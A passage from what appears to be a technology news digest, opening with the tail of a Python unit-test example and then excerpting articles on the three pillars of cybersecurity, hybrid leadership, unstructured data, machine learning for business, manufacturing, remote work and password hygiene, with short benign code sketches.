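    def test_zero_discount_leaves_price_unchanged(self):
        self.assertEqual(apply_discount(99.99, 0), 99.99)

    def test_invalid_percent_is_rejected(self):
        with self.assertRaises(ValueError):
            apply_discount(100.0, 150)

# run with: python -m unittest <this file>
```

Each test doubles as documentation of expected behaviour, which is one reason automated suites pay off as functionality accumulates.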


Combining Three Pillars Of Cybersecurity

As cybersecurity gaps abound, there has been growing panic in both industry and government over how to protect the cyber landscape. In the past, three significant risk management themes have been put forward to help reduce risk across the digital ecosystem: security by design, defense in depth, and zero trust. They are a triad, or three strong pillars of risk management, needed for a successful cybersecurity strategy. Security by Design is really the initiation point of a risk management process, especially if you are a software or hardware developer concerned with security. In an article in United States Cybersecurity magazine, cybersecurity expert Jeff Spivey provided an excellent working definition: “Security by Design ensures that security risk governance and management are monitored, managed and maintained on a continuous basis. The value of this ‘holistic’ approach is that it ensures that new security risks are prioritized, ordered and addressed in a continual manner with continuous feedback and learning.” Defense in Depth. A variety of strong definitions exist for defense in depth in the security community.


The Future of Team Leadership Is Multimodal

Effective leadership in this new hybrid world requires different skills that go beyond traditional team leadership. Specifically, organizations will need leaders who can operate well across two distinct modes. For much of the time, they will operate in virtual coordination mode. This means establishing goals, monitoring progress, driving information sharing, and sustaining connections among colleagues working remotely. When their teams periodically come together to engage in true collaboration, leaders will need to operate in face-to-face collaboration mode, fostering deep learning, innovation, acculturation, and dedication. The nature and mix of team tasks will dictate the modes in which those teams operate. Tasks that involve working interdependently but without much integration — reporting, performing administrative tasks, making simple decisions, sharing information, drafting documents, and performing financial analyses — will mostly be done virtually. Likewise, our research and experience have shown that most one-on-one interactions between leaders and their reports, including some coaching, can be accomplished effectively through virtual means. However, essential tasks that require team members to integrate their knowledge, create safe spaces for dialogue on difficult issues, and form emotional connections cannot be done productively while working virtually.


Unstructured data: the hidden threat in digital business

With the growth of unstructured data comes the unfortunate truth that it’s much more difficult to control and secure than structured data. For example, if an employee is taking information in the form of unstructured data and moving it elsewhere, they may store the original document or picture on a local file share or send it in an email as an attachment. Within one organization, the process for handling documents could vary across employees and teams, and it’s very likely that management has no idea this is happening. Unstructured data doesn’t have to be a forever risk, though. It’s entirely possible for organizations to manage and incorporate it into safe data practices and protocols. For that to happen successfully, business leaders must do the following: First, acknowledge that unsecured unstructured data is a problem within the organization. Add it as an urgent priority for the IT or data security teams to address. Don’t wait until an issue arises or assume that hackers are going to go after larger volumes of what one assumes is more “attractive” data. We’ve learned that hackers are unpredictable and that no organization, no matter the size or scope, is immune to the threat.


How You Can Expedite Your Venture With Machine Learning

With machine learning tools, organizations can identify profitable opportunities, as well as potential risks, more promptly. ML aids companies in improving business scalability and enhancing business operations. Rapidly evolving techniques in the ML field are expanding the use of machine learning to nearly infinite possibilities. The article focuses on how you can expedite your business growth with the use of machine learning, and here are the key points: Prediction of the market segment: When a business enters the market with a new idea, it is very important to understand and forecast the market’s reaction. If you rely on human intelligence for a logical prediction, it would be a huge task to consider all the applicable parameters from a large set of historical data. However, if you use the correct classification algorithm(s), you can predict whether the response from the prospective market segment will be good, bad, or neutral. In addition, you can use continuous or regression algorithms to predict its size or range. Prediction of customer lifetime value: For marketers, customer lifetime value prediction and customer segmentation are quite important. For this, companies use huge amounts of data effectively, with the help of ML and data mining, to obtain meaningful business insights.
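The classification idea can be sketched in a few lines. This toy example predicts a market segment's response ("good", "bad" or "neutral") with a simple nearest-neighbour vote; the features (average spend, engagement score) and the training points are invented for illustration, and a real project would train a proper classifier, e.g. with scikit-learn, on historical data.

```python
from math import dist

# Toy training data: (average spend, engagement score) -> observed response.
# Both the features and the labels are hypothetical, purely for illustration.
TRAINING = [
    ((80.0, 0.9), "good"),
    ((75.0, 0.8), "good"),
    ((20.0, 0.2), "bad"),
    ((15.0, 0.1), "bad"),
    ((50.0, 0.5), "neutral"),
    ((45.0, 0.6), "neutral"),
]

def predict_response(features, k=3):
    """Classify a new segment by majority vote among the k nearest
    training examples (a bare-bones k-nearest-neighbours classifier)."""
    neighbors = sorted(TRAINING, key=lambda ex: dist(ex[0], features))[:k]
    labels = [label for _, label in neighbors]
    return max(set(labels), key=labels.count)
```

The same shape of problem with a continuous target (e.g. expected segment size) would use a regression algorithm instead, exactly as the article notes.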


Manufacturing outlook for 2021 focuses on resilience

The prime driver for the acceleration is the drive to implement e-commerce platforms either for B2B or direct-to-consumer commerce, Yavar said. "Manufacturers are all chasing the KPI thresholds around quality and on-time delivery that Amazon set, so everybody's trying to get as close as possible to that two-day or one-day service," he said. "That's not easily done, so they're scrambling to understand how deploying technology like robotics can speed up the process and strategically align distribution functions, whether it's in-house or external, to cut costs." The increasing importance of the supply chain as a vital business process will spur innovation and bring new players into the market, Yavar explained. "It's akin to the ERP market of the 1990s and early 2000s where there was the traditional 'Big 5,' but then we saw the explosion of players with the advent of cloud. The same thing's happening in the supply chain technology space today," he said. "The barrier to entry to produce the technology and get in the marketplace is much lower than it used to be, so this market will become more and more dynamic over time, there will be consolidation, and new technology and the supply chain will be seen not as a cost center but a differentiator for manufacturers over the next several years."


CIOs Face Decisions on Remote Work for Post-Pandemic Future

The evolution of the global remote work force had its share of growing pains, says Cortney Thompson, CIO with cloud solutions and managed services provider Lunavi. Early on, opportunistic vendors made quick pushes to offer services to companies in dire need of going remote, but he says some stumbled along the way. “A few of those vendors had scaling problems as they brought additional load on,” Thompson says. That made it important to listen to the experiences companies were having with those vendors, he says, and how their performance changed in response. Naturally, if organizations did not see the results they wanted, they looked to branch out to other providers in the market, Thompson says. While some vendors took a conservative approach in taking on clients at the onset of the pandemic, he says others focused on grabbing as much of the market as possible without such restraint. In some instances, things broke under pressure, Thompson says. “There were some supply chain issues along the way and there was stress on the system and cracks started to show.” Innovations that found their footing during the pandemic include the zero-trust approach to security, he says, with higher adoption rates.


Data Security Accountability in an Age of Regular Breaches

When it comes to information security, cyber hygiene is remarkably analogous to biological hygiene. Much like the immune system within an organism, poor digital security hygiene can result in an infection (security incident) progressing into a full-blown compromise (data breach). The expectation is that the breached organization will take active measures to mitigate the effects of the data breach, and it ends there. However, this is not enough. Much like taking precautions against spreading the COVID-19 infection, individuals must play their part in reducing their own levels of digital security contagion. Following any discovered infection resulting from a breach (digital or biological), the best process is to engage in measures to quarantine yourself to reduce the exposure of others. One of the most basic digital hygiene methods simply relies upon the user deploying complex and unique passwords for each service they utilize. While this would be the first port of call when a data breach is discovered, the fact is such a practice is rarely followed, and further explains many of the breaches we've experienced to date. To address this, the general public's attitude toward passwords needs to evolve to that of phone numbers.
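The "complex and unique password for each service" practice the article recommends is essentially what a password manager automates, and can be sketched with Python's standard secrets module. The length and character set chosen here are illustrative assumptions, not a standard.

```python
import secrets
import string

# Sketch of basic digital hygiene: one strong, independently generated
# credential per service, so a breach at one service exposes only that
# one account. The 20-character length is an illustrative choice.

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_password(length=20):
    """Generate a cryptographically random password."""
    if length < 12:
        raise ValueError("length below a reasonable minimum")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

# One unique credential per service (hypothetical service names).
vault = {service: generate_password() for service in ("email", "bank", "forum")}
```

Using `secrets` rather than `random` matters here: the former draws from the operating system's cryptographically secure source, which is what credential generation requires.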



Quote for the day:

"Leadership offers an opportunity to make a difference in someone's life, no matter what the project." -- Bill Owens